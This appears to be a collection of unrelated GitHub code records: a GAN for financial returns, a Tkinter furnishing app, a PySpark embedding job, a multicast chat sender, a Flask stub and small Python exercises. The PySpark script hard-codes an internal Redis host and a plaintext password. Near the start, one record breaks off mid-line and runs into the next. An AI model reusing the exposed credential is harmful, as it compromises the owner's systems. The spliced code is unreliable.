generator([noise,label])\r\n#noise_gene_r=Reshape((1,1))(noise_gen)\r\n#label_r=Reshape((1,250))(label)\r\n\r\n\r\n##\r\ndiscriminator.trainable = False\r\n##\r\nvalid = discriminator([noise_gen, label])\r\ncombined = Model([noise, label], valid)\r\ncombined.compile(loss=['binary_crossentropy'],optimizer=optimizer)\r\n\r\nprint('ok')\r\n#train(ret_data,label_r)\r\n\r\n'Wasserstein model'\r\n#generator=build_generator()\r\n#discriminator=build_discriminator()\r\n#\r\n#\r\n#\r\n## define the label\r\n#label = Input(shape=(1,))\r\n#\r\n## generator graph\r\n#\r\n#discriminator.trainable = False\r\n#generator.trainable = True\r\n# \r\n#noise_gen = Input(shape=(z_size, ))\r\n#\r\n#\r\n#noise_data = generator([noise_gen,label])\r\n#valid = discriminator([noise_data,label])\r\n#\r\n#generator_model = Model([noise_gen,label], valid)\r\n#generator_model.compile(loss=wasserstein_loss, optimizer=optimizer)\r\n#\r\n#\r\n#\r\n#\r\n## discriminator graph\r\n#\r\n#generator.trainable = False\r\n#\r\n#real_data = Input(shape=(ret_data.shape[1],1))\r\n#noise = 
Input(shape=(z_size,))\r\n#fake_data = generator([noise,label])\r\n#\r\n#fake = discriminator([fake_data,label])\r\n#valid = discriminator([real_data,label])\r\n##\r\n#discriminator_model = Model(inputs=[real_data, noise,label], outputs=[valid, fake])\r\n#discriminator_model.compile(loss=[wasserstein_loss, wasserstein_loss], optimizer=optimizer, loss_weights=[1, 1])\r\n#\r\n#\r\n# \r\n\r\nepoch=1000\r\ntrain(ret_data)\r\n# \r\n#\r\n##ret_real=get_return(df_vol)\r\n#ret=cumreturn(get_return(df_sp))\r\n##\r\ndef generate_serie():\r\n    R=[]\r\n#    noise_t =np.random.normal(0, 1, size=(n_gene,z_size))\r\n    for k in range(label_w,len(ret_data)):\r\n        \r\n        label_t=ret_data[k-label_w:k]\r\n        label_t=label_t.reshape(1,len(label_t))\r\n\r\n        n_gene=1\r\n        noise_t =np.random.normal(0.5, 0.5, size=(n_gene,z_size))\r\n    #    noise_t =np.random.normal(0, 0.01, size=(n_gene,z_size))\r\n    ##noise_t=np.array([1 for i in range(100)]).reshape(1,100)\r\n    ##noise_t=ret_real.iloc[:100]\r\n    ##noise_t=np.array(noise_t).reshape(1,len(noise_t))\r\n    #\r\n        ret_gene=generator.predict([noise_t,label_t])\r\n    #    ret_gene=pd.DataFrame(ret_gene).T\r\n        R.append(float(ret_gene))\r\n    \r\n    R=pd.DataFrame(R) #R: the generator's output\r\n    R_real=pd.DataFrame(ret_data[label_w:]) #ret_data: z-score of the SPX returns\r\n    \r\n    ret_gene_brut=R #raw output \r\n    ret_gene=R*sig_data+m_data #rescale to recover real-scale data: de-z-score using the real data's mean and std\r\n    ret_real=R_real*sig_data+m_data #de-z-score ret_data: get the real cumreturn\r\n    \r\n    plt.figure(1)\r\n    plt.plot(cumreturn(ret_gene),label='cumreturn gene')\r\n    plt.plot(cumreturn(ret_real),label='cumreturn reel') \r\n    plt.legend() \r\n\r\n    plt.figure(2)\r\n    plt.plot(zscore(cumreturn(ret_gene)),label='z_s(cumreturn gene)')\r\n    plt.plot(zscore(cumreturn(ret_real)),label='z_s(cumreturn reel)') \r\n    plt.legend() \r\n    \r\n    plt.figure(3)\r\n    plt.plot(ret_gene,label='return gene')\r\n    plt.plot(ret_real,label='return real')\r\n    plt.legend()\r\n    \r\n    plt.figure(4)\r\n    plt.plot(ret_gene_brut,label='return gene brut')\r\n    plt.plot(R_real,label='ret_data')\r\n    plt.legend()\r\n    \r\n    plt.figure(5)\r\n    plt.plot(cumreturn(R),label='output brut')\r\n\r\n    \r\n    \r\ngenerate_serie()\r\n\r\n\r\ndef simulate_data(n_sim):\r\n    for k in range(n_sim):\r\n        data=generate_serie()\r\n        data_gene=data[1]\r\n        data_reel=data[0]\r\n        print(k)\r\n        plt.plot(data_gene,label='gene_nn')\r\n        plt.plot(data_reel,label='reel')\r\n        plt.legend()\r\n    \r\n#simulate_data(1) \r\n\r\ndef simulate_mean_data(n_sim):\r\n    L=[]\r\n    for k in range(n_sim):\r\n        data=generate_serie()\r\n        data_gene=data[1]\r\n        data_reel=data[0]\r\n        L.append(data_gene)\r\n    X=pd.concat([L[i] for i in range(len(L))],axis=1)\r\n    X_mean=X.mean(axis=1)\r\n    plt.plot(X_mean,label='gene') \r\n    plt.plot(data_reel,label='reel')\r\n    plt.legend()\r\n    \r\n#simulate_mean_data(10)\r\n\r\n\r\n#plt.plot(price_gene,label='gene')\r\n#plt.plot(price_real,label='real')\r\n#plt.legend()\r\n\r\n#plt.figure(1)\r\n#plt.plot(R,label='gene')\r\n#plt.legend()\r\n#\r\n#plt.figure(2)\r\n#plt.plot(R_real,label='real')\r\n#plt.legend()\r\n\r\n###\r\n#price_real=data_vol.iloc[0]\r\n##\r\n#plt.figure(3)\r\n#plt.plot(price_gene,label='gene')\r\n#plt.plot(price_real,label='reel')\r\n#plt.legend()\r\n\r\n#R_new=R-R.mean()\r\n#prix_new=get_price(R_new,1).iloc[:500]\r\n#plt.plot(prix_new,label='ge')\r\n#plt.plot(price_real,label='real')\r\n\r\n#plt.figure(4)\r\n#plt.plot(R,label='gene')\r\n#plt.plot(R_real,label='real')\r\n#plt.legend()\r\n\r\n\r\n\r\ndef get_correlation(x,y,start,end):\r\n
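    # note: Pearson correlation of the two series restricted to the window [start, end).\r\n    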
s1=x.iloc[start:end]\r\n s2=y.iloc[start:end]\r\n\r\n return(s1.corr(s2,method='pearson'))\r\n \r\ndef get_mean_corr(x,y,roll_w):\r\n R=[]\r\n for start in range(0,len(x),5):\r\n if start+roll_w > len(x):\r\n rho=get_correlation(x,y,start,len(x))\r\n R.append(rho)\r\n else:\r\n rho=get_correlation(x,y,start,start+roll_w)\r\n R.append(rho)\r\n corr_m=sum([rho for rho in R])\r\n print(corr_m)\r\n \r\n \r\n#X=mean_generate('Apple',10)\r\n \r\n \r\n \r\ndef KS_test(X,Y,alpha=0.1):\r\n x=np.array(X)\r\n y=np.array(Y)\r\n test=stats.ks_2samp(x, y)\r\n p_value=test[1]\r\n if p_value\", lambda event: self.imageClick(event.x, event.y))\n\t\tself.iPanel.grid(row=0,column=0)\n\n\tdef initUserPanel(self):\n\t\tself.pref_frame = tk.Frame(self.root, bg=\"#686aa8\")\n\t\tself.pref_frame.grid(row=0, column=1)\n\t\tself.new_button = tk.Button(self.pref_frame, text=\"Upload New Room\", command=self.newRoom)\n\t\tself.new_button.grid(row=1, column=0)\n\t\tself.save_button = tk.Button(self.pref_frame, text=\"Save this Room\", command=self.saveRecs)\n\t\tself.save_button.grid(row=1, column=1)\n\t\ttk.Label(self.pref_frame, bg=\"#686aa8\", text=\"Enter budget: \").grid(row=2, column=0)\n\t\tself.budget_entry = tk.Entry(self.pref_frame)\n\t\tself.budget_entry.grid(row=2, column=1)\n\n\t\ttk.Label(self.pref_frame, bg=\"#686aa8\", text=\"Pick a Style: \").grid(row=3, column=0)\n\t\tself.style_var = tk.StringVar()\n\t\tself.style_var.set('modern')\n\t\tself.style_menu = tk.OptionMenu(self.pref_frame, self.style_var, *self.UP.styles)\n\t\tself.style_menu.grid(row=3, column=1)\n\n\t\tself.pref_button = tk.Button(self.pref_frame, text=\"Update Preferences\", command=self.updateUser)\n\t\tself.pref_button.grid(row=5, column=0, columnspan=2)\n\t\tself.dirPanel = tk.Label(self.pref_frame, bg=\"#686aa8\", text=\"Click somewhere to add an object! \\n Click on an object to customize it! \\n \" + \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t \"To save your room with links, click 'Save this Room'! \\n Don't forget to keep a budget! \\n\")\n\t\tself.dirPanel.grid(row=10, column=0, columnspan=2)\n\t\tself.quit_button = tk.Button(self.pref_frame, text=\"QUIT\", fg=\"red\",command=quit)\n\t\tself.quit_button.grid(row=11,column=0, columnspan=2)\n\n\n\tdef initResultsPanel(self):\n\t\tself.res_frame = tk.Frame(self.root, bg=\"#686aa8\")\n\t\tself.res_frame.grid(row=1, column=0)\n\n\tdef run(self):\n\t\tself.root.mainloop()\n\t\tprint('bye')\n\n\tdef saveRecs(self):\n\t\tif self.RR == None:\n\t\t\tmessagebox.showinfo(\"Invalid Request\", \"You must upload a room before trying to save one!\")\n\t\telse:\n\t\t\twith open(\"room.txt\", \"w\") as f:\n\t\t\t\tfor r in self.RR.recs:\n\t\t\t\t\tf.write(\"\\n\")\n\t\t\t\t\tf.write(str(r.name) + \", \" + str(r.price) + \"\\n\" + str(r.url))\n\n\tdef newRoom(self):\n\t\tfilename = askopenfilename()\n\t\timage = Image.open(filename)\n\t\timage = self.fitToDisplay(image, 600, 600)\n\t\timage_tk = ImageTk.PhotoImage(image)\n\t\tself.drawImageOnLabel(image_tk, self.iPanel, lambda label: label.grid(row=0, column=0))\n\t\tmessagebox.showinfo(\"Hello!\", \"Your room is being processed ... stay tuned!\")\n\t\tself.initRoomReader(filename)\n\t\tif len(self.RR.pois) > 0: self.drawImageOnLabel(self.image, self.iPanel, lambda label: label.grid(row=0, column=0))\n\n\tdef initRoomReader(self, fname):\n\t\tself.RR = room_reader.RoomReader(fname)\n\t\tself.RR.findPOIs()\n\t\tif len(self.RR.pois) < 1: \n\t\t\tmessagebox.showinfo(\"DROOM Speaking\", \"Hmmm... we're not quite sure what you want. 
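\n\t\t# builds the right-hand preferences panel: upload/save actions, budget entry, style picker, and instructions.\n\t\t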
Click somewhere to get started!\")\n\t\telse:\n\t\t\tself.RR.getRecommendations(self.UP)\n\t\t\tself.image = self.RR.getDisplayImage()\n\t\t\tself.RR.updateRecs()\n\t\t\tself.addResults(self.RR.recs)\n\n\tdef addResults(self, recs):\n\t\tself.removeOldRecs()\n\t\tresnum = len(recs)# if len(recs) < 3 else 3\n\t\tfor n in range(resnum):\n\t\t\tframe = tk.Frame(self.res_frame, bg=\"#686aa8\", bd=10)\n\t\t\tframe.grid(row=0, column=n)\n\t\t\timage_tk = ImageTk.PhotoImage(Image.fromarray(recs[n].getRGBImage()).resize((100, 100), Image.ANTIALIAS))\n\t\t\tt = recs[n].name if len(recs[n].name) <= 20 else str(recs[n].name[:17] + \"...\")\n\t\t\ttext = tk.Label(frame, text=t)\n\t\t\tprice = tk.Label(frame, text='${:,.2f}'.format(recs[n].price))\n\t\t\ttext.grid(row=0, column=0)\n\t\t\tprice.grid(row=1, column=0)\n\t\t\tself.drawImageOnLabel(image_tk, tk.Label(frame), lambda label: label.grid(row=2, column=0))\n\n\tdef drawImageOnLabel(self, image, label, grid_func):\n\t\tlabel.configure(image = image)\n\t\tlabel.image = image\n\t\tgrid_func(label)\n\n\tdef imageClick(self, x, y):\n\t\tp = self.RR.poiClicked(x, y)\n\t\tif p != None:\n\t\t\tself.getPOIOptions(p, x, y)\n\t\telse:\n\t\t\tmessagebox.showinfo(\"DROOM Speaking\", \"Looks like you want to make your room dreamier ... \\n We'll be right back with suggestions!\")\n\t\t\tself.RR.drawPoint(x, y)\n\t\t\tself.image = self.RR.getDisplayImage()\n\t\t\tself.drawImageOnLabel(self.image, self.iPanel, lambda label: label.grid(row=0, column=0))\n\t\t\tself.RR.addPOI(x, y, self.UP.style, self.UP.budget)\n\t\t\tself.image = self.RR.getDisplayImage()\n\t\t\tself.drawImageOnLabel(self.image, self.iPanel, lambda label: label.grid(row=0, column=0))\n\t\t\tself.RR.updateRecs()\n\t\t\tself.addResults(self.RR.recs)\n\t\n\tdef getPOIOptions(self, p, x, y):\n\n\t\tarea_var = tk.StringVar()\n\t\tprod_var = tk.StringVar()\n\t\ttype_var = tk.StringVar()\n\t\tfur_var = tk.StringVar()\n\n\t\ttl = tk.Toplevel()\n\t\ttk.Label(tl, bg=\"#686aa8\", text=\"Choose a room area: \").grid(row=1, column=0)\n\t\tarea_var.set(p.area)\n\t\tarea_menu = tk.OptionMenu(tl, area_var, *self.UP.areas)\n\t\tarea_menu.grid(row=1, column=1)\t\n\n\n\t\ttk.Label(tl, bg=\"#686aa8\", text=\"Choose a product style: \").grid(row=3, column=0)\n\t\ttype_var.set('')\n\t\ttype_menu = tk.OptionMenu(tl, type_var, *self.UP.types)\n\t\ttype_menu.grid(row=3, column=1)\t\n\n\t\tif p.product == 'furniture':\n\t\t\ttk.Label(tl, bg=\"#686aa8\", text=\"Choose a furniture type: \").grid(row=4, column=0)\n\t\t\tfur_var.set(p.product)\n\t\t\tfur_menu = tk.OptionMenu(tl, fur_var, *self.UP.furnitures)\n\t\t\tfur_menu.grid(row=4, column=1)\n\t\telse:\t\n\t\t\ttk.Label(tl, bg=\"#686aa8\", text=\"Choose a product type: \").grid(row=2, column=0)\n\t\t\tprod_var.set('')\n\t\t\tprod_menu = tk.OptionMenu(tl, prod_var, *self.UP.objects)\n\t\t\tprod_menu.grid(row=2, column=1)\t\n\n\n\t\tdef removePOI():\n\t\t\tself.RR.removePOI(p.id)\n\t\t\ttl.destroy()\n\t\t\tself.image = self.RR.getDisplayImage()\n\t\t\tself.drawImageOnLabel(self.image, self.iPanel, lambda label: label.grid(row=0, column=0))\n\t\t\tself.RR.updateRecs()\n\t\t\tself.addResults(self.RR.recs)\n\n\t\tdef addPrefs(p = p, a = area_var, prod = prod_var, t = type_var, f = fur_var):\n\t\t\tp.area, p.product, p.prod_type, p.fur = a.get(), prod.get(), t.get(), f.get()\n\t\t\tself.RR.updatePOI(p, self.UP.style, self.UP.budget)\n\t\t\tself.image = self.RR.getDisplayImage()\n\t\t\tself.drawImageOnLabel(self.image, self.iPanel, lambda label: label.grid(row=0, 
column=0))\n\t\t\tself.RR.updateRecs()\n\t\t\tself.addResults(self.RR.recs)\n\n\t\tdef close(top=tl):\n\t\t\taddPrefs()\n\t\t\ttl.destroy()\n\n\t\tremove_poi_button = tk.Button(tl, text=\"I don't want this :(\", command=removePOI)\n\t\tremove_poi_button.grid(row=10, column=0, columnspan=2)\n\n\t\tdestroy_button = tk.Button(tl, text=\"find something new!\", fg=\"red\",command=close)\n\t\tdestroy_button.grid(row=11,column=0, columnspan=2)\n\n\n\tdef fitToDisplay(self, image, w, h):\n\t\ti_w, i_h = image.size[1], image.size[0]\n\t\tratio = min( w/i_w, h/i_h)\n\t\treturn image.resize((int(i_h * ratio), int(i_w * ratio)), Image.ANTIALIAS)\n\n\n\tdef updateUser(self):\n\t\tself.UP.setBudget(self.budget_entry.get())\n\t\tself.UP.setStyle(self.style_var.get())\n\t\tmessagebox.showinfo(\"Update\", \"Your preferences have been updated! \\n We'll be back with fresh finds in a bit!\")\n\t\tself.RR.getRecommendations(self.UP)\n\t\tself.image = self.RR.getDisplayImage()\n\t\tself.drawImageOnLabel(self.image, self.iPanel, lambda label: label.grid(row=0, column=0))\n\t\tself.RR.updateRecs()\n\t\tself.removeOldRecs()\n\t\tself.addResults(self.RR.recs)\n\n\n\tdef removeOldRecs(self):\n\t\tfor w in self.res_frame.winfo_children():\n\t\t\tw.destroy()\n\n\tdef saveRoom(self):\n\t\tpass\n\ndef main():\n\tapp = GUI()\n\tapp.run()\n\nmain()","repo_name":"arushibandi/droom","sub_path":"final tp/src/main_final.py","file_name":"main_final.py","file_ext":"py","file_size_in_byte":8206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35341272490","text":"import random\n\nedad = random.randint(1, 100)\ndia_semana = random.randint(1, 7)\nhora_pelicula = random.randint(13, 21)\n\nprint(\"El dia de semana es: \", dia_semana)\nprint(\"La edad es: \", edad)\nprint(\"La hora de la pelicula es: \", hora_pelicula)\n\nif dia_semana == 1:\n print(\"Lunes popular, el descuento es del 50%\")\n descuento = 50\nelse:\n if edad >= 60:\n print(\"Es un adulto mayor, su descuento es del 50%\")\n descuento = 50\n else:\n if edad <= 10 and hora_pelicula < 17:\n print(\"Es un nino, le toca un descuento del 50\")\n descuento = 50\n else:\n descuento = 0\n\nprint(\"El descuento final es del: \", descuento, \"%\")\n","repo_name":"ljtrevizon/Logica-de-Programacion-en-Python","sub_path":"Nivel 2/ejemplo11_1.py","file_name":"ejemplo11_1.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35370803305","text":"#-*- coding: utf-8 -*-\nimport os\nos.environ['JAVA_HOME']='/opt/Bigdata/client/JDK/jdk1.8.0_272'\nos.environ['SPARK_HOME']='/opt/Bigdata/client/Spark2x/spark'\nos.system(\"source /opt/Bigdata/client/bigdata_env\")\nos.system(\"/opt/Bigdata/client/KrbClient/kerberos/bin/kinit -kt /workspace/gpsearch.keytab GPSearch\")\nos.system(\"source /opt/Bigdata/client/Hudi/component_env\")\n#export HADOOP_USER_NAME=hive\n#os.environ['HADOOP_USER_NAME']='hive'\nimport findspark\nfindspark.init()\nimport sys\n# --jars hdfs:///user/lisensen/tools/jpmml-sparkml-executable-1.5.13.jar\n# pyspark_submit_args = ' --executor-memory 2g --driver-memory 8g --executor-cores 2 --num-executors 30 --conf spark.shuffle.spill.numElementsForceSpillThreshold=2000000 --conf spark.memory.storageFraction=0.2 --conf spark.dlism=2000 --conf spark.sql.shuffle.partitions=2000 --conf spark.dynamicAllocation.enabled=false --conf spark.port.maxRetries=100 --conf spark.driver.maxResultSize=8g' + ' 
pyspark-shell'\npyspark_submit_args = ' --master local[*] --driver-memory 16g --executor-cores 1 --conf spark.driver.extraJavaOptions=\" -Xss16384k\" --conf spark.driver.memoryOverhead=4g --conf spark.local.dir=/opt/home/lisensen/temp --conf spark.shuffle.memoryFraction=0.1 --conf spark.kryoserializer.buffer.max=1800m' + ' pyspark-shell'\nos.environ[\"PYSPARK_SUBMIT_ARGS\"] = pyspark_submit_args\nos.environ['HADOOP_USER_NAME']='hdfs'\n#import findspark\n#findspark.init()\nimport argparse\nimport os\nimport sys\nfrom pyspark import StorageLevel\nfrom pyspark import SparkConf, SparkContext\nfrom pyspark.sql import HiveContext,SQLContext,Row,SparkSession\nfrom pyspark.sql.types import *\nimport pyspark.sql.functions as F\nfrom pyspark.sql.functions import udf,col,column\nimport pyspark.sql.types as typ\nfrom pyspark.sql.types import StructType\nfrom pyspark.sql.types import StructField\nfrom pyspark.sql.types import StringType, IntegerType\nimport jieba\nimport os\nimport pandas as pd\nfrom pyhive import hive\nimport re\nimport faiss\nimport mkl\nimport numpy as np\nimport argparse\nimport json\nimport redis\nimport paddle\nimport paddle.nn.functional as F\nimport paddlenlp as ppnlp\nfrom paddlenlp.data import Stack, Tuple, Pad\nfrom model import BertMetric\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--params_path\", type=str, default='./model_state.pdparams',\n help=\"The path to model parameters to be loaded.\")\nparser.add_argument(\"--max_seq_length\", default=50, type=int,\n help=\"The maximum total input sequence length after tokenization. \"\n \"Sequences longer than this will be truncated, sequences shorter will be padded.\")\nparser.add_argument(\"--batch_size\", default=32, type=int, help=\"Batch size per GPU/CPU for training.\")\nparser.add_argument('--device', choices=['cpu', 'gpu'], default=\"cpu\",\n help=\"Select which device to train model, defaults to gpu.\")\nparser.add_argument('--emb_size', type=int, default=1024, help=\"embedding dims\")\nparser.add_argument('--cls_size', type=int, default=31, help=\"total class nums\")\nparser.add_argument(\"--redis_host\", type=str, default='10.255.24.40')\nparser.add_argument(\"--redis_password\", type=str, default='S4wKxoLGRo')\nparser.add_argument(\"--redis_port\", type=int, default=6379)\nparser.add_argument(\"--redis_db\", type=int, default=14)\nparser.add_argument(\"--exp_seconds\", type=int, default=7*24*3600)\nargs = parser.parse_args()\n\nremove_words = ['【福利秒杀】','【每日福利】','【福利爆款】','【专柜品质】','【1元秒杀】','【直播专用1元秒杀】','【','】','源本']\n\ndef remove(x):\n for r in remove_words:\n x = x.replace(r, '')\n x = x.strip()\n return x\n\ndef convert_example(query, tokenizer, max_seq_length=512, is_test=False):\n #print(query)\n query_encoded_inputs = tokenizer(query, max_seq_len=max_seq_length)\n query_input_ids = query_encoded_inputs[\"input_ids\"]\n query_token_type_ids = query_encoded_inputs[\"token_type_ids\"]\n #return query_input_ids, query_token_type_ids\n return paddle.to_tensor([query_input_ids], dtype=paddle.int64), \\\n paddle.to_tensor([query_token_type_ids], dtype=paddle.int64)\n\nif __name__ == '__main__':\n sparkConf = SparkConf()\n sparkConf.set(\"spark.app.name\", \"deep_emb_infer\").set(\"spark.ui.port\", \"4060\")\n spark = SparkSession.builder.config(conf=sparkConf).enableHiveSupport().getOrCreate()\n sc = spark.sparkContext\n\n pd_spu = spark.sql(\"\"\"\n select distinct spu_sn, spu_name\n from dm_recommend.dws_recommend_dj_frxs_skusn_details_di \n where status = 'UP'\n \"\"\").toPandas()\n\n 
pd_spu['spu_name'] = pd_spu['spu_name'].apply(lambda x:remove(x))\n    print(\"pd_spu cnt : {}\".format(len(pd_spu)),flush=True)\n\n    paddle.set_device(args.device)\n    pretrained_model = ppnlp.transformers.RobertaModel.from_pretrained('roberta-wwm-ext-large')\n    tokenizer = ppnlp.transformers.RobertaTokenizer.from_pretrained('roberta-wwm-ext-large')\n\n    print(\"loading model...\",flush=True)\n    model = BertMetric(pretrained_model, args.emb_size, args.cls_size)\n    if args.params_path and os.path.isfile(args.params_path):\n        state_dict = paddle.load(args.params_path)\n        model.set_dict(state_dict)\n        print(\"Loaded parameters from %s\" % args.params_path)\n\n    model.eval()\n    sentences = pd_spu['spu_name'].values\n    print(\"model input data size : {}\".format(len(sentences)), flush=True)\n    vec_result = []\n    for s in sentences:\n        query_input_ids, query_token_type_ids = convert_example(s, tokenizer, max_seq_length=args.max_seq_length, is_test=True)\n        vec_out = model.predict_emb(query_input_ids, query_token_type_ids)\n        vec_result.append(vec_out[0])\n    print(\"model output data size : {}\".format(len(vec_result)), flush=True)\n\n    mkl.get_max_threads()\n    d = 1024\n    index = faiss.IndexFlatL2(d)   # build the index\n    #print(index.is_trained)   # boolean indicating whether the index needs training\n    index.add(np.array(vec_result))                  # add vectors to the index\n    #print(index.ntotal)\n    D, I = index.search(np.array(vec_result), 13) # actual search\n    print(\"emb similar output cnt : {}\".format(len(I)),flush=True)\n    pool = redis.ConnectionPool(host=args.redis_host, port=args.redis_port, password=args.redis_password, db=args.redis_db)\n    #print(\"redis: {}:{} {} {}\".format(args.redis_host, args.redis_port, args.redis_password, args.redis_db),flush=True)\n    r = redis.Redis(connection_pool=pool)\n    pipe = r.pipeline() # create a pipeline\n    for i in range(0, len(I)):\n        curr_spusn = pd_spu.spu_sn.values[i]\n        curr_spusn_similar_str = ''\n        for similar_index in I[i][1:]:\n            curr_spusn_similar_str += pd_spu.spu_sn.values[similar_index] + ','\n        curr_spusn_similar_str = curr_spusn_similar_str.strip(',')\n        pipe.set('dj_similar:{}'.format(curr_spusn), curr_spusn_similar_str)\n        pipe.expire('dj_similar:{}'.format(curr_spusn) , args.exp_seconds)\n    pipe.execute()\n    sc.stop()\n","repo_name":"forrestsocool/bertMetric","sub_path":"deep_emb_infer.py","file_name":"deep_emb_infer.py","file_ext":"py","file_size_in_byte":6983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32974403359","text":"import numpy as np\na = np.array ([[1,2,3],[1,2,3],[3,2,1]])\nb = np.array ([[5,6,7],[5,2,7],[7,6,8]])\nc= a+b\nd= a-b\ne= np.matmul (a,b)\nq = np.matmul (a,np.linalg.inv(b))\nprint (c)\nprint (d)\nprint (e)\nprint (q)\n","repo_name":"ZLozZ/PYTHON","sub_path":"B6_nop/B1.py","file_name":"B1.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39963179376","text":"import os\nimport subprocess\nimport socket\nimport sys  # needed for the sys.exit() calls below\n\ndef send(message):\n\tANY = '0.0.0.0'\n\tSENDERPORT=1501\n\tMCAST_ADDR = '224.168.2.9'\n\tMCAST_PORT = 8946\n\tsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n\tsock.bind((ANY,SENDERPORT))\n\tsock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)\n\n\t#Send 50 times as a temporary fix until TCP is put in\n\tloop = 0\n\n\twhile loop <= 50:\n\t\tsock.sendto(message, (MCAST_ADDR,MCAST_PORT) )\n\t\tloop += 1\n\tsock.close()\n\nsender = subprocess.check_output('echo %username%', shell=True)\nsender = 
sender = sender.rstrip()\ntarget = subprocess.check_output('cscript textbox.vbs \"WiN\" \"Recipient:\"', shell=True).decode()\ntarget = target.split('\\n')\ntarget = target[3].rstrip('\\r\\n')\nif target == \"\":\n\tsys.exit()\n\nmessage = subprocess.check_output('cscript textbox.vbs \"WiN\" \"Message:\"', shell=True).decode()\nmessage = message.split('\\n')\nmessage = message[3].rstrip('\\r\\n')\nif message == \"\":\n\tsys.exit()\n\n#Messages are encoded like so \"senderProgramVx.x##target##sender##message\"\n#Example: \"linuxV1.8##person87##NickGeek##Hey mate! What do you think of this WiN thing?\"\nformattedMessage = \"windowsV0.1##\"+target+\"##\"+sender+\"##\"+message\n\n#Send message\nsend(formattedMessage)","repo_name":"NickGeek/WiN","sub_path":"Windows/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"18837223847","text":"import cv2\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\ndef process_image(image_path):\n    # Load the image using OpenCV\n    image = cv2.imread(image_path)\n\n    # Apply the image processing that determines the fat and meat percentages\n    # (the application-specific logic still needs to be implemented here)\n\n    # Simple placeholder logic for demonstration\n    percent_gordura = 30.0\n    percent_carne = 70.0\n\n    return percent_gordura, percent_carne\n\n@app.route('/processar-imagem', methods=['POST'])\ndef processar_imagem():\n    # Check whether an image was sent with the form\n    if 'imagem' not in request.files:\n        return 'Nenhuma imagem encontrada'\n\n    imagem = request.files['imagem']\n\n    # Save the image to a temporary file\n    imagem_temporaria = 'caminho/para/temp/imagem.jpg'\n    imagem.save(imagem_temporaria)\n\n    # Process the image\n    percent_gordura, percent_carne = process_image(imagem_temporaria)\n\n    # Return the results as JSON\n    return jsonify({'percent_gordura': percent_gordura, 'percent_carne': percent_carne})\n\nif __name__ == '__main__':\n    app.run()\n","repo_name":"Emerson19Reis/Projeto-Percentual-de-gordura","sub_path":"back.py","file_name":"back.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13423416108","text":"import pandas as pd\nimport numpy as np\n\ndf = pd.DataFrame({\"Nome\":[\"João da Silva\",\n                          \"Carlos Souza\",\n                          \"Maria Ferreira\"],\n                  \"Idade\":[22, 35, 58],\n                  \"Sexo\":[\"masculino\",\"masculino\",\"feminino\"]})\nprint(df,\"\\n\")\n\ns = pd.Series(np.random.randn(5), index=['a','b','c','d','e'])\nprint(s,'\\n')\n\nd = {'b':1, 'a':0, 'c':2}\nprint(pd.Series(d),'\\n')\n","repo_name":"Mutanne/hiworld","sub_path":"python/Ta4.py","file_name":"Ta4.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19794277608","text":"from PIL import Image\nfrom PIL import ImageDraw\n\nimport time\nimport signal\n\nfrom firob.core.worker.worker import Worker\nfrom robscreen import constants\n\nfrom pkg_resources import resource_filename\n\nimport robscreen.core.bakebit_128_64_oled as oled\nfrom robscreen.core.annuaire import Annuaire\n\n\nclass Screen(Worker):\n\n    def __init__(self):\n        Worker.__init__(self, 0.1)\n\n        print(\"Init Screen\")\n        oled.init()                  # initialize SEEED OLED display\n        oled.clearDisplay()          # clear the screen and set start position to top left corner\n        oled.setNormalDisplay()      # Set display to normal mode (i.e. non-inverse mode)\n
        oled.setHorizontalMode()     # Set addressing mode to Page Mode\n\n        picture = resource_filename('robscreen.resources', 'firob.png')\n        image = Image.open(picture).convert('1')\n        oled.drawImage(image)\n        \n        self.__page = Annuaire.getInstance().getPage(Annuaire.PAGE_DEFAULT)\n        \n        time.sleep(1)\n\n    def execute(self):\n        image = Image.new('1', (constants.WIDTH, constants.HEIGHT))\n        draw = ImageDraw.Draw(image)\n        self.__page.draw(draw)\n        oled.drawImage(image)\n\n    def end(self):\n        oled.clearDisplay()\n    \n    def k1(self):\n        page_num = self.__page.k1()\n        self.__page = Annuaire.getInstance().getPage(page_num)\n    def k2(self):\n        page_num = self.__page.k2()\n        self.__page = Annuaire.getInstance().getPage(page_num)\n    def k3(self):\n        page_num = self.__page.k3()\n        self.__page = Annuaire.getInstance().getPage(page_num)\n    \n","repo_name":"GuillaumeEscande/robscreen","sub_path":"robscreen/core/screen.py","file_name":"screen.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13283000709","text":"# Section12-1\n# Python database integration (SQLite)\n# Structured Query Language\n# Basics of inserting, updating, deleting and selecting data\n\n# run cmd as administrator when launching it\n\nimport sqlite3 # ships with Python\nimport datetime\n\n# build the timestamp used for the inserts\nnow = datetime.datetime.now()\nprint(now)\n# 2021-04-01 15:43:38.979971  current date and time\nnowDatetime = now.strftime('%Y-%m-%d %H:%M:%S')\nprint('nowDatetime : ' , nowDatetime) # nowDatetime :  2021-04-01 15:45:21\n# sqlite3\nprint('sqlite3.version: ', sqlite3.version ) # sqlite3.version: 2.6.0\nprint('sqlite3.sqlite.version: ', sqlite3.sqlite_version ) # sqlite3.sqlite.version: 3.33.0\n\n\n\n# create the DB & auto-commit (rollback = going back to the state before the insert)\n\n# commit applies the data we entered to the database.\n\nconn = 